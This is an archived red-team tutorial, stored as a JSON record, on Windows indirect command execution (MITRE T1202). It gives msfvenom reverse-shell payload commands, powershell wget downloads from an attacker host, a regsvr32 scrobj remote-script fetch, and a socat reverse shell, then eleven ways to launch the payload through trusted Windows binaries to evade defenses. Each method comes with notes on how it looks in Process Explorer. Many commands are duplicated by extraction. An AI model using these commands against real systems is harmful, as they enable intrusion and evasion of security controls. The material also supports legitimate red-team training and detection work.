{
	"id": "d215f48c-8156-4624-8748-840432ae747e",
	"created_at": "2026-04-06T00:11:02.649349Z",
	"updated_at": "2026-04-10T03:21:48.971994Z",
	"deleted_at": null,
	"sha1_hash": "9fd8ee281a067f9d820511a40086a0beb08e4f95",
	"title": "Indirect Command Execution: Defense Evasion (T1202)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1500855,
	"plain_text": "Indirect Command Execution: Defense Evasion (T1202)\r\nBy raj\r\nPublished: 2022-03-17 · Archived: 2026-04-05 17:32:26 UTC\r\nRed Teams often use Indirect Command Execution as a defense evasion technique in which an adversary tries to\r\nbypass certain defense filters that restrict certain types of scripts/executables from running. Various Windows\r\nutilities allow users to execute commands, possibly without invoking cmd. For example, if a firewall restricts DLL\r\nexecution, an adversary can bypass it using a procdump method, or if a whitelist exists on certain executables\r\ncontaining pcalua.exe, an adversary can use it to execute other executables. This article discusses some of these\r\nmethods.\r\nMITRE TACTIC: Defense Evasion (TA0005)\r\nMITRE TECHNIQUE ID: T1202 (Indirect Command Execution)\r\nTable of content\r\nMalicious EXE creation\r\nMethod 1 – forfiles.exe\r\nMethod 2 – pcalua.exe\r\nMethod 3 – procdump.exe (DLL method)\r\nMethod 4 – SyncAppvPublishingServer.vbs\r\nMethod 5 – wlrmdr.exe\r\nMethod 6 – explorer.exe\r\nMethod 7 – cmd.exe\r\nMethod 8 – ftp.exe\r\nMethod 9 – conhost.exe\r\nMethod 10 – WSL Only (bash.exe)\r\nMethod 11 – WSL Only (wsl.exe)\r\nConclusion\r\nMalicious EXE Creation\r\nFirst, we need to create an executable that will be executed. This is a simple simulation of what might happen in a\r\nreal-time Red Team scenario. We’ll use msfvenom to create a simple reverse shell. After that, we need to upload\r\nthis exe into the victim machine using a python server.\r\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe \u003e shell.exe\r\npython3 -m http.server 80\r\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe \u003e shell.exe python3 -m\r\nhttp.server 80\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 1 of 22\n\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe \u003e shell.exe\r\npython3 -m http.server 80\r\nNow, we can upload this executable to the already compromised victim device using powershell wget\r\npowershell wget 192.168.0.89/shell.exe -O C:UsersPublicshell.exe\r\npowershell wget 192.168.0.89/shell.exe -O C:UsersPublicshell.exe\r\npowershell wget 192.168.0.89/shell.exe -O C:UsersPublicshell.exe\r\nNow, the file is uploaded in the C:UsersPublic directory for further use.\r\nMethod 1 – forfiles\r\nAccording to Microsoft, “Selects and runs a command on a file or set of files. This command is most commonly\r\nused in batch files.” Here, /p specifies the path where forfiles will search for the search mask defined by /m flag\r\n(here, calc.exe). However, anything after the /c flag is the actual command. Hence, forfiles will now run our\r\ncustom-made shell — a classic example of indirect command execution in Windows.\r\nforfiles /p c:windowssystem32 /m calc.exe /c C:UsersPublicshell.exe\r\nforfiles /p c:windowssystem32 /m calc.exe /c C:UsersPublicshell.exe\r\nforfiles /p c:windowssystem32 /m calc.exe /c C:UsersPublicshell.exe\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 2 of 22\n\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, forfiles.exe is running a suspicious\r\nfile “shell.exe”\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 3 of 22\n\nMethod 2 – pcalua.exe\r\nThe Program Compatibility Assistant is an automatic feature of Windows that runs when it detects an older\r\nprogram has a compatibility problem. Because of the utility of this executable, systems more often whitelist it.\r\nThis can also run custom exe in compatibility mode. We can run our executable using the program with “-a” flag\r\nlike:\r\npcalua.exe -a C:UsersPublicshell.exe\r\npcalua.exe -a C:UsersPublicshell.exe\r\npcalua.exe -a C:UsersPublicshell.exe\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 4 of 22\n\nOn our reverse listener set up on port 4444, we receive a connection as we execute the shell!\r\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, shell.exe has spawned as a\r\nstandalone process.\r\nMethod 3 – procdump.exe (DLL method)\r\nProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and\r\ngenerating crash dumps during a spike that an administrator or developer can use to determine the cause of the\r\nspike. The sysinternals team developed this binary, which you can also use to execute a DLL file by utilizing the\r\n‘MiniDumpCallbackRoutine’ exported function. You must provide a valid ongoing process as you will create the\r\nmemory dump of that process while loading this DLL onto it.\r\nFirst, we need to create our DLL payload using msfvenom\r\nmsfvenom -p windows/shell_reverse_tcp -f dll LHOST=192.168.0.89 LPORT=4444 \u003e shell.dll\r\nmsfvenom -p windows/shell_reverse_tcp -f dll LHOST=192.168.0.89 LPORT=4444 \u003e shell.dll\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 5 of 22\n\nmsfvenom -p windows/shell_reverse_tcp -f dll LHOST=192.168.0.89 LPORT=4444 \u003e shell.dll\r\nOnce, the DLL has been uploaded onto the victim system, using python server and powershell wget utility,\r\nprocdump can be run with the “-md” option\r\nC:Sysinternalsprocdump.exe -md shell.dll explorer.exe\r\nC:Sysinternalsprocdump.exe -md shell.dll explorer.exe\r\nC:Sysinternalsprocdump.exe -md shell.dll explorer.exe\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, our DLL has been executed using\r\nrundll as a child process of procdump.\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 6 of 22\n\nMethod 4 – SyncAppvPublishingServer.vbs\r\nSyncAppvPublishingServer.vbs is a script available in newer versions on Windows 10 and 11 only. Microsoft\r\ndevelops this and users can utilize it for MS Application Virtualization. Users can also indirectly use it for\r\nexecuting EXE. The .NET cmdlet known as “Start-Process” achieves this.\r\nSyncAppvPublishingServer.vbs \"n; Start-Process C:UsersPublicshell.exe\"\r\nSyncAppvPublishingServer.vbs \"n; Start-Process C:UsersPublicshell.exe\"\r\nSyncAppvPublishingServer.vbs \"n; Start-Process C:UsersPublicshell.exe\"\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 7 of 22\n\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, a conhost has been spawned inside\r\na powershell process.\r\nSince just passing in the exe’s path can make the VBS script execute it, we can also use the regsrv32 method in\r\nMetasploit.\r\nuse multi/script/web_delivery\r\nset payload windows/meterpreter/reverse_tcp\r\nuse multi/script/web_delivery set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.89 set lport 1337\r\nset target 3 run\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 8 of 22\n\nuse multi/script/web_delivery\r\nset payload windows/meterpreter/reverse_tcp\r\nset lhost 192.168.0.89\r\nset lport 1337\r\nset target 3\r\nrun\r\nNow, we can inject this command into the SyncAppvPublishingServer.vbs script by giving a break clause and then\r\nthe one liner.\r\nSyncAppvPublishingServer.vbs \"Break; regsvr32 /s /n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct\r\nscrobj.dll\"\r\nSyncAppvPublishingServer.vbs \"Break; regsvr32 /s /n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct\r\nscrobj.dll\"\r\nSyncAppvPublishingServer.vbs \"Break; regsvr32 /s /n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct\r\nOn our Metasploit console, we receive a reverse shell!\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 9 of 22\n\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, a conhost has been spawned inside\r\na powershell process.\r\nMethod 5 – wlrmdr.exe\r\nWindows Logon Reminder (wlrmdr.exe) is an executable file available by default in Microsoft which often throws\r\nup balloon reminders saying that Windows needs to lock and unlock the device in order to update windows login\r\ncredentials. Here, this tool is taking a bunch of flags for input, making it a potential candidate for Indirect\r\nCommand Execution scenarios.\r\n-s : Time to show notification in milliseconds. Use 0 to display the notification without a timeout.\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 10 of 22\n\n-f \u003cx\u003e   One or more of the following values that indicate an icon to display in the notification.\r\n0x00000000 = Do not display an icon.\r\n0x00000001 = Display an information icon.\r\n0x00000002 = Display a warning icon.\r\n0x00000003 = Display an error icon.\r\n0x00000004 = Icon of keys.\r\n0x00000010 = Do not play the associated sound.\r\nx is decimal. To display an information icon without sound = 0x01 + 0x10 = 0x11 = 17 decimal\r\n-t: Text first Line\r\n-m: Text second Line\r\n-u:  Executable to run\r\nwlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:UsersPublicshell.exe\r\nwlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:UsersPublicshell.exe\r\nwlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:UsersPublicshell.exe\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, shell.exe as a standalone has been\r\nspawned.\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 11 of 22\n\nMethod 6 – explorer.exe\r\nWhen a user opens the file manager, they run the executable Explorer.exe. The path bar, which mentions the\r\ncurrent working directory, also serves as a run prompt where entering the name of a binary spawns it (like\r\ncmd.exe). Moreover, Explorer.exe spawns the binary as a child process. You can also achieve this via the\r\ncommand line.\r\nexplorer.exe /root,\"C:UsersPublicshell.exe\"\r\nexplorer.exe /root,\"C:UsersPublicshell.exe\"\r\nexplorer.exe /root,\"C:UsersPublicshell.exe\"\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 12 of 22\n\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, cmd.exe has been spawned which\r\nin turn runs our shell.exe\r\nMethod 7 – cmd.exe\r\nCmd.exe is the command prompt (terminal) of Windows and is capable of executing binaries using the /c flag.\r\nOne can indirectly execute a malicious file using cmd.exe like so:\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 13 of 22\n\ncmd.exe /c C:UsersPublicshell.exe\r\ncmd.exe /c C:UsersPublicshell.exe\r\ncmd.exe /c C:UsersPublicshell.exe\r\nMoreover, an attacker may also benefit from the lesser-known path traversal execution method. This lets an\r\nattacker traverse back to explorer.exe and use that to initiate the process for “shell.exe.” This complicates the\r\nanalysis part for a blue teamer and is considered better than the previous method.\r\ncmd.exe /c \"ignite.local /../../../../../../../../../../windows/explorer.exe\" /root,C:UsersPublicshell.exe\r\ncmd.exe /c \"ignite.local /../../../../../../../../../../windows/explorer.exe\" /root,C:UsersPublicshell.exe\r\ncmd.exe /c \"ignite.local /../../../../../../../../../../windows/explorer.exe\" /root,C:UsersPublicshel\r\nOn our reverse listener set up on port 4444, we establish a connection as the shell executes!\r\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, the system has spawned a conhost\r\n(masking our shell) as a child process under the explorer.exe process and it is stealthier.\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 14 of 22\n\nMethod 8 – ftp.exe\r\nNewer versions of Windows 10 and 11 come with a ftp.exe binary already included with the default installation.\r\nMoreover, the system PATH variable makes it available, and you can execute it from any working directory.\r\nThereafter, we can load the command we want to run in a text file called “script.txt” and execute it using the ftp -s\r\noption which executes text files as a script. Hence, we include the explorer.exe command in this script and execute\r\nit using ftp.\r\necho !explorer.exe /root,\"C:UsersPublicshell.exe\" \u003e script.txt \u0026\u0026 ftp -s:script.txt\r\necho !explorer.exe /root,\"C:UsersPublicshell.exe\" \u003e script.txt \u0026\u0026 ftp -s:script.txt\r\necho !explorer.exe /root,\"C:UsersPublicshell.exe\" \u003e script.txt \u0026\u0026 ftp -s:script.txt\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 15 of 22\n\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, an ftp instance is running with no\r\nnotable indication of our shell.exe in processes making it stealthier.\r\nMethod 9 – conhost.exe\r\nConhost.exe stands for Console Host which was introduced with Windows 7. It is sort of a bridge between old\r\nschool CRSS and cmd.exe. More information can be found here. In simpler terms, it helps Command Prompt to\r\ninteract with Windows explorer and provides functionality like drag and drop text from explorer to cmd.exe—\r\nanother technique useful for Indirect Command Execution.\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 16 of 22\n\nConhost can also be used to launch arbitrary executables. Depending on which Windows version you are using the\r\nresults may vary but as per Build 1809, I found it to be working.\r\nconhost \"ignite.local C:UsersPublicshell.exe\"\r\nconhost \"ignite.local C:UsersPublicshell.exe\"\r\nconhost \"ignite.local C:UsersPublicshell.exe\"\r\nOn our reverse listener set up on port 4444, we establish a connection as the shell executes!\r\nInspection in process explorer:\r\nIn the victim system, if an analyst checks process explorer, he shall see the following processes running that\r\nshould make him suspicious. As you can see, a cmd.exe process has launched a conhost instance. It remains\r\nstealthy compared to other methods as the process explorer doesn’t show shell.exe.\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 17 of 22\n\nMethod 10 - WSL Only (bash.exe)\r\nMethod 10 - WSL Only (bash.exe)\r\nMethod 10 - WSL Only (bash.exe)\r\nThe next two methods are use-case specific. WSL stands for Windows Subsystem for Linux and can help a user\r\ninstall an instance of their favourite Linux distro onto Windows itself by creating a subsystem. Here, the victim\r\nhas installed an Ubuntu instance in WSL. It can be installed by instructions provided here.\r\nIf the victim installs WSL with the socat package, they can use bash.exe present in the system to obtain a reverse\r\nshell like so:\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 18 of 22\n\nbash.exe -c \"socat tcp-connect:192.168.0.89:4444 exec:sh,pty,stderr,setsid,sigint,sane\"\r\nbash.exe -c \"socat tcp-connect:192.168.0.89:4444 exec:sh,pty,stderr,setsid,sigint,sane\"\r\nbash.exe -c \"socat tcp-connect:192.168.0.89:4444 exec:sh,pty,stderr,setsid,sigint,sane\"\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell executes!\r\nInspection in process explorer:\r\nOn the victim system, an analyst may check Process Explorer. They will notice some suspicious processes\r\nrunning. Specifically, the wsl.exe process has been launched. Under it, conhost.exe is initiated. Alongside it,socat\r\nand bash processes are also running. This behavior is stealthy and unusual.\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 19 of 22\n\nMethod 11 – WSL Only (wsl.exe)\r\nSocat instance on a WSL is plausible but not necessary. However, by default, the Windows system includes an\r\nexecutable called wsl.exe where it installs WSL. You can use this exe to launch the exe present in WSL. This way,\r\nthe shell will launch indirectly.\r\nwsl.exe -e /mnt/c/Users/Public/shell.exe\r\nwsl.exe -e /mnt/c/Users/Public/shell.exe\r\nwsl.exe -e /mnt/c/Users/Public/shell.exe\r\nWe receive a connection on our reverse listener set up on port 4444 as the shell executes!\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 20 of 22\n\nInspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the\r\nfollowing processes running that should make him suspicious. As you can see, the system has launched the\r\nwsl.exe process, which initiates conhost along with a shell.exe process. It is not as stealthy as other methods.\r\nConclusion\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 21 of 22\n\nWhile some of the methods defined above are stealthy, others create some noise. Red Teamers must evaluate\r\nwhich method they want to use in order for them to conduct operations smoothly. The aim of the article was to\r\ndemonstrate as many methods as possible for Indirect Command Execution in order for a user to evade defenses\r\neasily. Hope you liked the article. Thanks for reading.\r\nAuthor: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here\r\nSource: https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/"
	],
	"report_names": [
		"indirect-command-execution-defense-evasion-t1202"
	],
	"threat_actors": [],
	"ts_created_at": 1775434262,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9fd8ee281a067f9d820511a40086a0beb08e4f95.pdf",
		"text": "https://archive.orkl.eu/9fd8ee281a067f9d820511a40086a0beb08e4f95.txt",
		"img": "https://archive.orkl.eu/9fd8ee281a067f9d820511a40086a0beb08e4f95.jpg"
	}
}